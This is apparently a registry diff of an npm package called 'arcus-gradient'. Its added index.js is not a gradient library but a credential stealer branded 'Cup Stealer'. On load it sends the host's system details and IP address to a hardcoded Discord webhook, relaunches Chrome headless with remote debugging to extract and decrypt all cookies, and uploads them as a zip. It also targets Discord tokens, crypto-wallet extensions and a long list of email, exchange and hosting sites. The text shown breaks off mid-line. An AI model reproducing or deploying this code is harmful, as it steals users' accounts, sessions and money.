arcus-gradient 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of arcus-gradient might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/functions/gradientColors.js +19 -0
  2. package/index.js +2223 -0
  3. package/package.json +22 -0
package/index.js ADDED
@@ -0,0 +1,2223 @@
1
+ const fs = require('fs');
2
+ const path = require('path');
3
+ const httpx = require('axios');
4
+ const axios = require('axios');
5
+ const os = require('os');
6
+ const { totalmem, cpus, userInfo, uptime, hostname } = require('os');
7
+ const si = require('systeminformation');
8
+ const FormData = require('form-data');
9
+ const AdmZip = require('adm-zip');
10
+ const { execSync, exec } = require('child_process');
11
+ const crypto = require('crypto');
12
+ const sqlite3 = require('sqlite3');
13
+ const { Dpapi } = require('@primno/dpapi');
14
+ const childProcess = require('child_process');
15
+
16
+ const discords = [];
17
+ let injection_paths = []
18
+ const local = process.env.LOCALAPPDATA;
19
+ var appdata = process.env.APPDATA,
20
+ LOCAL = process.env.LOCALAPPDATA,
21
+ localappdata = process.env.LOCALAPPDATA;
22
+ let browser_paths = [localappdata + '\\Google\\Chrome\\User Data\\Default\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\', localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\', localappdata + '\\Google\\Chrome\\User Data\\Default\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\Network\\', localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\Network\\', appdata + '\\Opera Software\\Opera Stable\\', appdata + '\\Opera Software\\Opera GX Stable\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\', localappdata + '\\Microsoft\\Edge\\User Data\\Default\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\', localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\Network\\', localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\Network\\', localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Default\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\Network\\', localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\Network\\'];
23
+
24
+ const keywords = ["gmail.com", "live.com", "impots.gouv.fr", "zoho.com", "ameli.fr", "yahoo.com", "tutanota.com", "uber.com", "trashmail.com", "gmx.net", "github.com", "ubereats.com", "safe-mail.net", "thunderbird.net", "mail.lycos.com", "hushmail.com", "mail.aol.com", "icloud.com", "protonmail.com", "fastmail.com", "rackspace.com", "1and1.com", "mailbox.org", "mail.yandex.com", "titan.email", "youtube.com", "nulled.to", "cracked.to", "tiktok.com", "yahoo.com", "gmx.com", "aol.com", "coinbase", "mail.ru", "rambler.ru", "gamesense.pub", "neverlose.cc", "onetap.com", "fatality.win", "vape.gg", "binance", "ogu.gg", "lolz.guru", "xss.is", "g2g.com", "igvault.com", "plati.ru", "minecraft.net", "primordial.dev", "vacban.wtf", "instagram.com", "mail.ee", "hotmail.com", "facebook.com", "vk.ru", "x.synapse.to", "hu2.app", "shoppy.gg", "app.sell", "sellix.io", "gmx.de", "riotgames.com", "mega.nz", "roblox.com", "exploit.in", "breached.to", "v3rmillion.net", "hackforums.net", "0x00sec.org", "unknowncheats.me", "godaddy.com", "accounts.google.com", "aternos.org", "namecheap.com", "hostinger.com", "bluehost.com", "hostgator.com", "siteground.com", "netafraz.com", "iranserver.com", "ionos.com", "whois.com", "te.eg", "vultr.com", "mizbanfa.net", "neti.ee", "osta.ee", "cafe24.com", "wpengine.com", "parspack.com", "cloudways.com", "inmotionhosting.com", "hinet.net", "mihanwebhost.com", "mojang.com", "phoenixnap.com", "dreamhost.com", "rackspace.com", "name.com", "alibabacloud.com", "a2hosting.com", "contabo.com", "xinnet.com", "7ho.st", "hetzner.com", "domain.com", "west.cn", "iranhost.com", "yisu.com", "ovhcloud.com", "000webhost.com", "reg.ru", "lws.fr", "home.pl", "sakura.ne.jp", "matbao.net", "scalacube.com", "telia.ee", "estoxy.com", "zone.ee", "veebimajutus.ee", "beehosting.pro", "core.eu", "wavecom.ee", "iphoster.net", "cspacehostings.com", "zap-hosting.com", "iceline.com", "zaphosting.com", "cubes.com", "chimpanzeehost.com", "fatalityservers.com", "craftandsurvive.com", "mcprohosting.com", "shockbyte.com", "ggservers.com", "scalacube.com", "apexminecrafthosting.com", "nodecraft.com", "sparkedhost.com", "pebblehost.com", "ramshard.com", "linkvertise.com", "adf.ly", "spotify.com", "tv3play.ee", "clarity.tk", "messenger.com", "snapchat.com", "boltfood.eu", "stuudium.com", "steamcommunity.com", "epicgames.com", "greysec.net", "twitter.com", "reddit.com", "amazon.com", "redengine.eu", "eulencheats.com", "4netplayers.com", "velia.net", "bybit.com", "coinbase.com", "ftx.com", "ftx.us", "binance.us", "bitfinex.com", "kraken.com", "bitstamp.net", "bittrex.com", "kucoin.com", "cex.io", "gemini.com", "blockfi.com", "nexo.io", "nordvpn.com", "surfshark.com", "privateinternetaccess.com", "netflix.com", "astolfo.lgbt", "intent.store", "novoline.wtf", "flux.today", "novoline.lol", "twitch.tv"];
25
+ const webhook_url = 'https://discord.com/api/webhooks/1327855150332645477/7dk5yW-PjzD84bm3cSddtQRz8AF9jZtIS6pu8nMvK-SLLNmv7YhxqcS3rhEzuUePd2I7';
26
+ const DEBUG_PORTS = [9222, 9223, 9224];
27
+ const foldersToSearch = ['Videos', 'Desktop', 'Documents', 'Downloads', 'Pictures', path.join('AppData', 'Roaming', 'Microsoft', 'Windows', 'Recent')];
28
+ const mainFolderPath = `C:/Users/${process.env.USERNAME}/AppData/Local/Temp`;
29
+
30
+ async function newInjection() {
31
+ if (!webhook_url) {
32
+ console.error("Webhook URL não fornecido!");
33
+ return;
34
+ }
35
+
36
+ console.log("Webhook URL encontrado, iniciando a captura de dados...");
37
+
38
+ try {
39
+ const system_info = await si.osInfo();
40
+ const gpu_info = await si.graphics();
41
+ const memory_info = await si.mem();
42
+ const response = await axios.get('https://api.ipify.org/?format=json');
43
+ const ip_address = response.data.ip;
44
+
45
+ const injectionData = {
46
+ cpu: cpus()[0]?.model || 'Unknown',
47
+ gpu: gpu_info.controllers[0]?.model || 'Unknown',
48
+ uptime: Math.floor(Date.now() / 1000) - Math.floor(uptime()),
49
+ type: system_info?.platform,
50
+ architecture: system_info?.arch,
51
+ hostname: hostname(),
52
+ username: userInfo().username,
53
+ os: `${system_info?.distro} ${system_info?.build}`,
54
+ network: { ip: ip_address },
55
+ memory: `${(memory_info.total / (1024 ** 3)).toFixed(2)}`
56
+ };
57
+
58
+ const userInformationEmbed = {
59
+ author: {
60
+ name: `Cup Stealer | New Victim`,
61
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
62
+ },
63
+ color: 0x050000,
64
+ thumbnail: {
65
+ url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
66
+ },
67
+ fields: [
68
+ {
69
+ name: "<:userratos:1317152840321597490> **User**",
70
+ value: `\`${injectionData.username}\``,
71
+ inline: true
72
+ },
73
+ {
74
+ name: "<:ratossecurity:1316564382507077683> **System**",
75
+ value: `\`${injectionData.os}\``,
76
+ inline: true
77
+ },
78
+ {
79
+ name: "<:ratoswifi:1316564143687471105> **IP**",
80
+ value: `\`${injectionData.network.ip}\``,
81
+ inline: true
82
+ },
83
+ {
84
+ name: "<:ratospc:1316564315725103206> **CPU**",
85
+ value: `\`${injectionData.cpu}\``,
86
+ inline: true
87
+ },
88
+ {
89
+ name: "<:eqt:1317154908939616287> **GPU**",
90
+ value: `\`${injectionData.gpu}\``,
91
+ inline: true
92
+ },
93
+ {
94
+ name: "<:ram:1323255953721790565> **Memory RAM**",
95
+ value: `\`${injectionData.memory}\``,
96
+ inline: true
97
+ }
98
+ ],
99
+ footer: {
100
+ text: `Cup Stealer | ${process.env.username}`,
101
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
102
+ },
103
+ timestamp: new Date()
104
+ };
105
+
106
+
107
+ console.log("Preparando para enviar o webhook...");
108
+
109
+ try {
110
+ const webhookResponse = await axios.post(webhook_url, {
111
+ embeds: [userInformationEmbed]
112
+ });
113
+ console.log("Webhook enviado com sucesso! Status:", webhookResponse.status);
114
+ } catch (error) {
115
+ console.error('Erro ao enviar o webhook:', error.response ? error.response.data : error.message);
116
+ }
117
+
118
+ } catch (error) {
119
+ console.error('Erro ao coletar dados para o webhook:', error);
120
+ }
121
+ }
122
+
123
+ newInjection();
124
+
125
+ const browsersPaths = {
126
+ chrome: {
127
+ bin: `${process.env.PROGRAMFILES}\\Google\\Chrome\\Application\\chrome.exe`,
128
+ user_data: `${process.env.LOCALAPPDATA}\\Google\\Chrome\\User Data`
129
+ }
130
+ };
131
+
132
+ function findBrowsers() {
133
+ const browsersFound = [];
134
+ for (const [name, paths] of Object.entries(browsersPaths)) {
135
+ if (fs.existsSync(paths.bin)) {
136
+ console.log(`[INFO] Navegador encontrado: ${name}`);
137
+ browsersFound.push({ name, ...paths });
138
+ } else {
139
+ console.log(`[AVISO] Navegador não encontrado: ${name}`);
140
+ }
141
+ }
142
+ if (browsersFound.length === 0) {
143
+ console.log("[INFO] Nenhum navegador válido encontrado.");
144
+ }
145
+ return browsersFound;
146
+ }
147
+
148
+ // Função para fechar o processo do navegador
149
+ function closeBrowserProcess(binPath) {
150
+ const procName = path.basename(binPath);
151
+ console.log(`[INFO] Fechando processo ${procName}`);
152
+ try {
153
+ childProcess.execSync(`taskkill /F /IM ${procName}`, { stdio: 'ignore' });
154
+ } catch (error) {
155
+ console.warn(`[AVISO] Não foi possível fechar o processo ${procName}.`);
156
+ }
157
+ }
158
+
159
+ // Função para aguardar determinado tempo
160
+ function sleep(ms) {
161
+ return new Promise(resolve => setTimeout(resolve, ms));
162
+ }
163
+
164
+ // Função para iniciar o navegador com a porta de depuração e abrir o Gmail
165
+ async function startBrowser(binPath, userDataPath, debugPort, profileName) {
166
+ console.log(`[INFO] Iniciando navegador: ${binPath} com perfil ${profileName} na porta ${debugPort}`);
167
+ childProcess.spawn(binPath, [
168
+ '--headless',
169
+ '--restore-last-session',
170
+ `--remote-debugging-port=${debugPort}`,
171
+ '--remote-allow-origins=*',
172
+ `--user-data-dir=${userDataPath}`,
173
+ `--profile-directory=${profileName}`,
174
+ 'https://mail.google.com'
175
+ ], { detached: true, stdio: 'ignore' }).unref();
176
+
177
+ console.log("[INFO] Aguardando o navegador iniciar...");
178
+ await sleep(2000);
179
+ }
180
+
181
+ // Função para obter a URL do WebSocket do navegador
182
+ async function getWebSocketUrl(debugPort) {
183
+ const DEBUG_URL = `http://127.0.0.1:${debugPort}/json`;
184
+ try {
185
+ console.log("[INFO] Tentando conectar-se ao WebSocket...");
186
+ const response = await axios.get(DEBUG_URL);
187
+ if (response.data && response.data[0] && response.data[0].webSocketDebuggerUrl) {
188
+ return response.data[0].webSocketDebuggerUrl;
189
+ } else {
190
+ throw new Error("Não foi possível encontrar o WebSocket.");
191
+ }
192
+ } catch (error) {
193
+ console.error("[ERRO] Não foi possível conectar ao navegador.");
194
+ throw error;
195
+ }
196
+ }
197
+
198
+ // Função para extrair os cookies via WebSocket
199
+ async function extractCookies(wsUrl) {
200
+ console.log("[INFO] Obtendo cookies...");
201
+
202
+ return new Promise((resolve, reject) => {
203
+ const ws = new (require('ws'))(wsUrl);
204
+
205
+ ws.on('open', () => {
206
+ ws.send(JSON.stringify({ id: 1, method: 'Network.getAllCookies' }));
207
+ });
208
+
209
+ ws.on('message', (data) => {
210
+ const response = JSON.parse(data);
211
+ if (response.result && response.result.cookies) {
212
+ const decryptedCookies = response.result.cookies.map(cookie => {
213
+ if (cookie.encrypted_value) {
214
+ try {
215
+ const encryptedValue = Buffer.from(cookie.encrypted_value, 'base64');
216
+ const iv = encryptedValue.slice(3, 15);
217
+ const encryptedData = encryptedValue.slice(15, encryptedValue.length - 16);
218
+ const authTag = encryptedValue.slice(encryptedValue.length - 16, encryptedValue.length);
219
+ const decipher = crypto.createDecipheriv('aes-256-gcm', browserPath[0][3], iv);
220
+ decipher.setAuthTag(authTag);
221
+ const decrypted = decipher.update(encryptedData, 'base64', 'utf-8') + decipher.final('utf-8');
222
+ cookie.value = decrypted;
223
+ } catch (error) {
224
+ console.error("[ERRO] Falha ao descriptografar cookie:", error);
225
+ }
226
+ }
227
+ return cookie;
228
+ });
229
+ ws.close();
230
+ resolve(decryptedCookies);
231
+ } else {
232
+ console.error("[ERRO] Resposta do WebSocket não contém cookies.");
233
+ ws.close();
234
+ reject(new Error("Nenhum cookie encontrado."));
235
+ }
236
+ });
237
+
238
+ ws.on('error', (err) => {
239
+ console.error("[ERRO] Falha na conexão WebSocket:", err);
240
+ ws.close();
241
+ reject(err);
242
+ });
243
+ });
244
+ }
245
+
246
+ function saveCookiesToZip(cookiesByBrowser) {
247
+ const zip = new AdmZip();
248
+ const zipFileName = `${process.env.username}-cookies-fixed.zip`;
249
+
250
+ for (const [browserName, profilesCookies] of Object.entries(cookiesByBrowser)) {
251
+ for (const [profileName, cookies] of Object.entries(profilesCookies)) {
252
+ const cookieFileName = `${profileName}.txt`; // Nome do arquivo será o navegador + nome do perfil
253
+ const cookieStrings = cookies.map(cookie =>
254
+ `${cookie.domain}\tTRUE\t/\tFALSE\t2597573456\t${cookie.name}\t${cookie.value}`
255
+ ).join('\n');
256
+
257
+ // Salva o arquivo temporário com cookies
258
+ fs.writeFileSync(cookieFileName, cookieStrings);
259
+ zip.addLocalFile(cookieFileName);
260
+ fs.unlinkSync(cookieFileName); // Remove o arquivo temporário
261
+ }
262
+ }
263
+
264
+ zip.writeZip(zipFileName);
265
+ console.log(`[INFO] Cookies compactados no arquivo ${zipFileName}.`);
266
+ return zipFileName;
267
+ }
268
+
269
+ async function sendToDiscord(zipPath) {
270
+ console.log(`[INFO] Enviando ${zipPath} para o Discord...`);
271
+
272
+ const formData = new FormData();
273
+ formData.append('file', fs.createReadStream(zipPath));
274
+
275
+ // Adicionando a embed ao formulário
276
+ formData.append('payload_json', JSON.stringify({
277
+ }));
278
+
279
+ try {
280
+ const response = await axios.post(webhook_url, formData, {
281
+ headers: formData.getHeaders()
282
+ });
283
+
284
+ if (response.status === 200) {
285
+ console.log("[SUCESSO] Arquivo enviado com sucesso!");
286
+ } else {
287
+ console.error(`[ERRO] Falha ao enviar o arquivo. Código: ${response.status}`);
288
+ }
289
+ } catch (error) {
290
+ console.error(`[ERRO] Erro ao enviar para o Discord: ${error.message}`);
291
+ }
292
+ }
293
+
294
+ // Função para processar o navegador Chrome e extrair cookies de todos os perfis
295
+ async function processChrome(cookiesByBrowser) {
296
+ try {
297
+ const browser = browsersPaths.chrome;
298
+ const profiles = fs.readdirSync(browser.user_data)
299
+ .filter(profile => profile.startsWith('Profile ') || profile === 'Default');
300
+
301
+ let wsUrl;
302
+ let cookies;
303
+
304
+ for (const profile of profiles) {
305
+ for (const debugPort of DEBUG_PORTS) {
306
+ try {
307
+ closeBrowserProcess(browser.bin);
308
+ await startBrowser(browser.bin, browser.user_data, debugPort, profile);
309
+ wsUrl = await getWebSocketUrl(debugPort);
310
+ cookies = await extractCookies(wsUrl);
311
+
312
+ // Salva os cookies de cada perfil em uma estrutura de dados
313
+ if (!cookiesByBrowser[browser.name]) {
314
+ cookiesByBrowser[browser.name] = {}; // Inicializa o objeto para o navegador
315
+ }
316
+ cookiesByBrowser[browser.name][profile] = cookies;
317
+
318
+ // Aguardar 10 segundos antes de fechar o navegador
319
+ console.log("[INFO] Aguardando 10 segundos antes de fechar o navegador...");
320
+ await sleep(2000); // Esperar 10 segundos
321
+
322
+ closeBrowserProcess(browser.bin);
323
+ break; // Se tudo der certo, sai do loop
324
+ } catch (error) {
325
+ console.error(`[ERRO] Falha ao processar o Chrome na porta ${debugPort}. Tentando próxima porta...`);
326
+ }
327
+ }
328
+ }
329
+
330
+ if (!cookies) {
331
+ console.error("[ERRO] Não foi possível extrair cookies.");
332
+ }
333
+ } catch (error) {
334
+ console.error(`[ERRO] Falha ao processar o navegador Chrome: ${error.message}`);
335
+ }
336
+ }
337
+
338
+ // Função principal que orquestra o processo
339
+ (async () => {
340
+ const browsers = findBrowsers();
341
+ const cookiesByBrowser = {};
342
+
343
+ if (browsers.length > 0) {
344
+ for (const browser of browsers) {
345
+ if (browser.name === 'chrome') {
346
+ console.log(`[INFO] Processando navegador: ${browser.name}`);
347
+ await processChrome(cookiesByBrowser);
348
+ }
349
+ }
350
+
351
+ if (Object.keys(cookiesByBrowser).length > 0) {
352
+ const zipPath = saveCookiesToZip(cookiesByBrowser);
353
+ await sendToDiscord(zipPath);
354
+ } else {
355
+ console.log("[AVISO] Nenhum cookie extraído.");
356
+ }
357
+ } else {
358
+ console.log("[INFO] Nenhum navegador encontrado.");
359
+ }
360
+ })();
361
+
362
+ const config_logout = true
363
+ const config_disableqr = true
364
+
365
+ const maxRetries = 2;
366
+ let retryCount = 0;
367
+
368
+ let walletsPaths = [
369
+ `C:\\Users\\${process.env.USERNAME}\\AppData\\Roaming\\Exodus\\exodus.wallet`
370
+ ]
371
+
372
+ paths = [
373
+ appdata + '\\discord\\',
374
+ appdata + '\\discordcanary\\',
375
+ appdata + '\\discordptb\\',
376
+ appdata + '\\discorddevelopment\\',
377
+ appdata + '\\lightcord\\',
378
+ localappdata + '\\Google\\Chrome\\User Data\\Default\\',
379
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\',
380
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\',
381
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\',
382
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\',
383
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\',
384
+ localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\',
385
+ localappdata + '\\Google\\Chrome\\User Data\\Default\\Network\\',
386
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 1\\Network\\',
387
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 2\\Network\\',
388
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 3\\Network\\',
389
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 4\\Network\\',
390
+ localappdata + '\\Google\\Chrome\\User Data\\Profile 5\\Network\\',
391
+ localappdata + '\\Google\\Chrome\\User Data\\Guest Profile\\Network\\',
392
+ appdata + '\\Opera Software\\Opera Stable\\',
393
+ appdata + '\\Opera Software\\Opera GX Stable\\',
394
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
395
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
396
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
397
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
398
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
399
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
400
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
401
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
402
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
403
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
404
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
405
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
406
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
407
+ localappdata + '\\Microsoft\\Edge\\User Data\\Default\\',
408
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
409
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
410
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
411
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
412
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
413
+ localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
414
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\',
415
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\Network\\',
416
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\Network\\',
417
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\Network\\',
418
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\Network\\',
419
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\Network\\',
420
+ localappdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\Network\\',
421
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\Network\\',
422
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\Network\\',
423
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\Network\\',
424
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\Network\\',
425
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\Network\\',
426
+ localappdata + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\',
427
+ localappdata + '\\Microsoft\\Edge\\User Data\\Default\\Network\\',
428
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 1\\Network\\',
429
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 2\\Network\\',
430
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 3\\Network\\',
431
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 4\\Network\\',
432
+ localappdata + '\\Microsoft\\Edge\\User Data\\Profile 5\\Network\\',
433
+ localappdata + '\\Microsoft\\Edge\\User Data\\Guest Profile\\Network\\'
434
+ ];
435
+
436
+ function onlyUnique(item, index, array) {
437
+ return array.indexOf(item) === index;
438
+ }
439
+
440
+ const config = {
441
+ "logout": "instant",
442
+ "inject-notify": "true",
443
+ "logout-notify": "true",
444
+ "init-notify": "false",
445
+ "embed-color": 3553599,
446
+ "disable-qr-code": "true"
447
+ }
448
+
449
+ const _0x9b6227 = {}
450
+ _0x9b6227.passwords = 0
451
+ _0x9b6227.cookies = 0
452
+ _0x9b6227.autofills = 0
453
+ _0x9b6227.wallets = 0
454
+ _0x9b6227.telegram = false
455
+ const count = _0x9b6227,
456
+ user = {
457
+ ram: os.totalmem(),
458
+ version: os.version(),
459
+ uptime: os.uptime,
460
+ homedir: os.homedir(),
461
+ hostname: os.hostname(),
462
+ userInfo: os.userInfo().username,
463
+ type: os.type(),
464
+ arch: os.arch(),
465
+ release: os.release(),
466
+ roaming: process.env.APPDATA,
467
+ local: process.env.LOCALAPPDATA,
468
+ temp: process.env.TEMP,
469
+ countCore: process.env.NUMBER_OF_PROCESSORS,
470
+ sysDrive: process.env.SystemDrive,
471
+ fileLoc: process.cwd(),
472
+ randomUUID: crypto.randomBytes(16).toString('hex'),
473
+ start: Date.now(),
474
+ debug: false,
475
+ copyright: '<= t.me/cupstealer =>\n\n',
476
+ url: null,
477
+ }
478
+ _0x2afdce = {}
479
+ const walletPaths = _0x2afdce,
480
+ _0x4ae424 = {}
481
+ _0x4ae424.Trust = '\\Local Extension Settings\\egjidjbpglichdcondbcbdnbeeppgdph'
482
+ _0x4ae424.Metamask =
483
+ '\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn'
484
+ _0x4ae424.Coinbase =
485
+ '\\Local Extension Settings\\hnfanknocfeofbddgcijnmhnfnkdnaad'
486
+ _0x4ae424.BinanceChain =
487
+ '\\Local Extension Settings\\fhbohimaelbohpjbbldcngcnapndodjp'
488
+ _0x4ae424.Phantom =
489
+ '\\Local Extension Settings\\bfnaelmomeimhlpmgjnjophhpkkoljpa'
490
+ _0x4ae424.TronLink =
491
+ '\\Local Extension Settings\\ibnejdfjmmkpcnlpebklmnkoeoihofec'
492
+ _0x4ae424.Ronin = '\\Local Extension Settings\\fnjhmkhhmkbjkkabndcnnogagogbneec'
493
+ _0x4ae424.Exodus =
494
+ '\\Local Extension Settings\\aholpfdialjgjfhomihkjbmgjidlcdno'
495
+ _0x4ae424.Coin98 =
496
+ '\\Local Extension Settings\\aeachknmefphepccionboohckonoeemg'
497
+ _0x4ae424.Authenticator =
498
+ '\\Sync Extension Settings\\bhghoamapcdpbohphigoooaddinpkbai'
499
+ _0x4ae424.MathWallet =
500
+ '\\Sync Extension Settings\\afbcbjpbpfadlkmhmclhkeeodmamcflc'
501
+ _0x4ae424.YoroiWallet =
502
+ '\\Local Extension Settings\\ffnbelfdoeiohenkjibnmadjiehjhajb'
503
+ _0x4ae424.GuardaWallet =
504
+ '\\Local Extension Settings\\hpglfhgfnhbgpjdenjgmdgoeiappafln'
505
+ _0x4ae424.JaxxxLiberty =
506
+ '\\Local Extension Settings\\cjelfplplebdjjenllpjcblmjkfcffne'
507
+ _0x4ae424.Wombat =
508
+ '\\Local Extension Settings\\amkmjjmmflddogmhpjloimipbofnfjih'
509
+ _0x4ae424.EVERWallet =
510
+ '\\Local Extension Settings\\cgeeodpfagjceefieflmdfphplkenlfk'
511
+ _0x4ae424.KardiaChain =
512
+ '\\Local Extension Settings\\pdadjkfkgcafgbceimcpbkalnfnepbnk'
513
+ _0x4ae424.XDEFI = '\\Local Extension Settings\\hmeobnfnfcmdkdcmlblgagmfpfboieaf'
514
+ _0x4ae424.Nami = '\\Local Extension Settings\\lpfcbjknijpeeillifnkikgncikgfhdo'
515
+ _0x4ae424.TerraStation =
516
+ '\\Local Extension Settings\\aiifbnbfobpmeekipheeijimdpnlpgpp'
517
+ _0x4ae424.MartianAptos =
518
+ '\\Local Extension Settings\\efbglgofoippbgcjepnhiblaibcnclgk'
519
+ _0x4ae424.TON = '\\Local Extension Settings\\nphplpgoakhhjchkkhmiggakijnkhfnd'
520
+ _0x4ae424.Keplr = '\\Local Extension Settings\\dmkamcknogkgcdfhhbddcghachkejeap'
521
+ _0x4ae424.CryptoCom =
522
+ '\\Local Extension Settings\\hifafgmccdpekplomjjkcfgodnhcellj'
523
+ _0x4ae424.PetraAptos =
524
+ '\\Local Extension Settings\\ejjladinnckdgjemekebdpeokbikhfci'
525
+ _0x4ae424.OKX = '\\Local Extension Settings\\mcohilncbfahbmgdjkbpemcciiolgcge'
526
+ _0x4ae424.Sollet =
527
+ '\\Local Extension Settings\\fhmfendgdocmcbmfikdcogofphimnkno'
528
+ _0x4ae424.Sender =
529
